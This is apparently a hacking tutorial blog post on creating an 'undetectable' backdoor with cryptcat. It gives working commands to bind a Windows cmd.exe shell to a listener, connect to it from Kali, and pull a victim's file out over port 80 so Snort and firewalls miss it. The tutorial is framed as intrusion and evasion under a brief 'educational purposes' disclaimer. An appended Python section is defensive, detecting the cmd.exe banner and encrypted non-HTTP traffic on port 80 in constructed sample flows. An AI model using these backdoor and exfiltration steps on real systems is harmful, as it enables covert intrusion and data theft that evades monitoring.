Create a Backdoor Using CryptCat
Create An Undetectable Backdoor Using Cryptcat
Hey there guys, in this tutorial I'm going to show you how to create an almost undetectable backdoor using Cryptcat.
So let's get cracking...
What Is Cryptcat?
CryptCat is a simple Unix utility which reads and writes data across network connections, using the TCP or UDP protocol, while encrypting the data being transmitted. It is designed to be a reliable "back-end" tool that can be used directly or easily driven by other programs and scripts. At the same time, it is a feature-rich network debugging and exploration tool, since it can create almost any kind of connection you would need and has several interesting built-in capabilities. Cryptcat lets us communicate between two systems and encrypts the communication between them with Twofish, one of many excellent encryption algorithms from Bruce Schneier et al. Twofish's encryption is on par with AES, making it nearly bulletproof. Because the payload is encrypted, the IDS can't inspect the content to detect the malicious behavior taking place, even when it's travelling across normal HTTP ports like 80 and 443.
This tutorial is for educational purposes only and should not be used for any illegal activities. I'M NOT RESPONSIBLE IF YOU CAUSE ANY DAMAGE OR MISUSE IT. Don't INTRUDE into someone's privacy.
Step I: Download Cryptcat
You can download and install cryptcat on a Windows system using this link.
Step II: Open a Listener on the Windows System
We will need two separate systems for this tutorial: one loaded with Windows 7 (which I prefer) and the other with BackTrack/Kali. We can open a listener on any system with a syntax similar to netcat's. In this case, we're opening a listener on a Windows 7 system on port 6996 and spawning a command shell.
cryptcat -l -p 6996 -e cmd.exe
Step III: Open Snort
Now, fire up an IDS like Snort on another system that will connect to the Windows system, to see whether the encryption is able to "blind" the IDS, leaving our backdoor invisible to such security devices.
Step IV: Connecting to the Windows System...
Since cryptcat is installed by default on BackTrack, we don't have to download and install it. In addition, it's in /bin, so we can run it from any directory.
Now, we can connect to the Windows 7 system with cryptcat from our BackTrack system and see whether we can complete an encrypted backdoor connection that is nearly impossible to detect.
cryptcat 192.168.182.248 6996
As you can see, we connected to the Windows 7 system and received a command shell from it! This gives us significant control over that system, though not total control, as the shell has its limits.
Step V: Checking Your Snort Logs...
This type of attack (passing a command shell across the wire) is easily detected by Snort or other IDSs when the connection is unencrypted. Snort rules will alert the sysadmin that a cmd.exe shell has traversed their network connection, and they are likely to do something about it to keep you from using that command shell. With the encrypted connection that cryptcat provides, this connection should be nearly undetectable. Let's go back now and check the logs and alerts in Snort. If we were successful in evading the IDS, you should NOT see any alerts about a command shell moving across the wire. We can check our logs by opening /var/snort/alerts and seeing whether any alerts were triggered by our connection to the Windows machine.
kwrite /var/snort/alerts
Step VI: Sending Cryptcat to Bypass Firewall
Although we have successfully created an encrypted backdoor on the victim system, a vigilant security admin will notice that an unusual port (6996) is open. This will likely trigger some action by the security admin to limit our access. In addition, on systems with a good sysadmin and a good firewall, this port will likely be blocked by the firewall.
For any network to communicate on the Internet, it will likely need to keep ports 80 and 443 open, and possibly 25, 53 and 110 as well. Since normal, unencrypted web traffic travels over port 80, it is nearly always open, and a little more traffic will hardly be noticed.
Now that we have successfully used cryptcat, we'll send it over port 80 with all the other Internet traffic. Although it will be encrypted, it will look like any other binary data crossing the wire. It will be nearly impossible for the security devices to detect or block it, as they must always allow traffic on port 80, and the traffic is encrypted, so the IDS can't "see" the contents.
This time, instead of sending a command shell across the wire, we will move a file called test.txt from the victim's system to our attack system over the encrypted connection, without any of the security devices detecting it. We can do this by typing at the Windows command prompt:
cryptcat -l -p 80 < test.txt
(use the file's actual name and extension, e.g. test.doc)
Step VII: Connecting To Listener.
Now, let's connect to the victim's system and pull across the test file. All we need to do is connect to the listener by typing cryptcat, the IP address of the victim system, and the port number of the listener.
cryptcat 192.168.182.248 80
Step VIII: Checking the Alert Files.
Let's once again check our Snort log files for any evidence that our IDS detected this movement of the top secret file.
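The two situations in Step V and Steps VI to VIII (a cleartext cmd.exe shell that a Snort content rule catches, and an encrypted transfer on port 80 that carries no readable signature) can be reproduced on the defender's side with a small detector. The following Python is an added example for this post, not code from the tutorial or from cryptcat: it runs a content check of the kind Snort's cmd.exe banner rule performs, and a protocol/port mismatch check that flags a port-80 session which does not open like HTTP and has ciphertext-like entropy. All flows are constructed samples; the "encrypted" payloads are SHA-256 output standing in for cryptcat's Twofish ciphertext, 192.168.182.10 is a made-up client address, and 192.168.182.248 is the Windows address from the post.

```python
"""Added example (not code from the tutorial or from cryptcat).

Two checks a network defender can run over the first bytes of a TCP session:
  1. a content signature, like the Snort "cmd.exe banner" rule: it matches a
     cleartext Windows shell prompt but not the same session once encrypted;
  2. a protocol/port mismatch check: a session on port 80 whose payload does
     not start like HTTP, and whose bytes have ciphertext-like entropy, is
     flagged even though its contents cannot be read.
Every flow below is constructed sample data.  192.168.182.10 is a made-up
client; 192.168.182.248 is the Windows host address used in the post.
"""
import hashlib
import math
from dataclasses import dataclass


@dataclass
class Flow:
    src: str          # initiating host
    dst: str          # listening host
    port: int         # listener-side port (the port the session was opened to)
    payload: bytes    # first bytes observed on the session


# Content signature: the first line cmd.exe prints when spawned on a socket.
CMD_BANNER = b"Microsoft Windows [Version"

# A session on port 80 is expected to open with an HTTP request or status line.
HTTP_METHODS = (b"GET ", b"POST ", b"HEAD ", b"PUT ", b"DELETE ",
                b"OPTIONS ", b"CONNECT ", b"PATCH ")
HTTP_RESPONSE = b"HTTP/1."

# Shannon entropy in bits per byte: text and HTTP headers sit around 4-5,
# ciphertext and compressed data approach 8.  6.0 is a coarse cut-off.
ENTROPY_THRESHOLD = 6.0


def shannon_entropy(data: bytes) -> float:
    """Bits of entropy per byte of `data` (0.0 for empty input)."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def matches_cmd_banner(payload: bytes) -> bool:
    """Equivalent of a Snort 'content' match for the cmd.exe banner."""
    return CMD_BANNER in payload


def looks_like_http(payload: bytes) -> bool:
    """True if the session opens with an HTTP request line or status line."""
    return payload.startswith(HTTP_METHODS) or payload.startswith(HTTP_RESPONSE)


def inspect(flow: Flow) -> list:
    """Return the alert tags raised for one flow (empty list = no alert)."""
    alerts = []
    if matches_cmd_banner(flow.payload):
        alerts.append("cmd-exe-banner")
    if flow.port == 80 and not looks_like_http(flow.payload):
        alerts.append("non-http-on-80")
        if shannon_entropy(flow.payload) > ENTROPY_THRESHOLD:
            alerts.append("high-entropy-on-80")
    return alerts


def fake_ciphertext(n: int) -> bytes:
    """Deterministic stand-in for encrypted bytes (constructed, not Twofish)."""
    out, block = b"", b"constructed-sample"
    while len(out) < n:
        block = hashlib.sha256(block).digest()
        out += block
    return out[:n]


# Constructed sample sessions.
SHELL_BANNER = (b"Microsoft Windows [Version 6.1.7601]\r\n"
                b"Copyright (c) 2009 Microsoft Corporation.  All rights reserved.\r\n"
                b"\r\nC:\\Windows\\system32>")
SAMPLE_FLOWS = {
    "cleartext shell on 6996": Flow("192.168.182.10", "192.168.182.248", 6996, SHELL_BANNER),
    "encrypted shell on 6996": Flow("192.168.182.10", "192.168.182.248", 6996, fake_ciphertext(256)),
    "encrypted file on 80":    Flow("192.168.182.10", "192.168.182.248", 80, fake_ciphertext(256)),
    "ordinary http on 80":     Flow("192.168.182.10", "192.168.182.248", 80,
                                    b"GET /index.html HTTP/1.1\r\nHost: 192.168.182.248\r\n\r\n"),
}


def run_all() -> dict:
    """Inspect every sample flow; maps each flow label to its alert tags."""
    return {label: inspect(flow) for label, flow in SAMPLE_FLOWS.items()}


if __name__ == "__main__":
    for label, alerts in run_all().items():
        print(f"{label:26s} -> {alerts or 'no alert'}")
```

The cleartext shell trips the banner signature, the encrypted shell on port 6996 trips nothing (the situation the tutorial describes), and the encrypted transfer on port 80 is still flagged because the session never speaks HTTP and its bytes look like ciphertext. A plaintext file sent the same way would only raise the "non-http-on-80" tag, which is why the protocol check is worth keeping separate from the entropy heuristic.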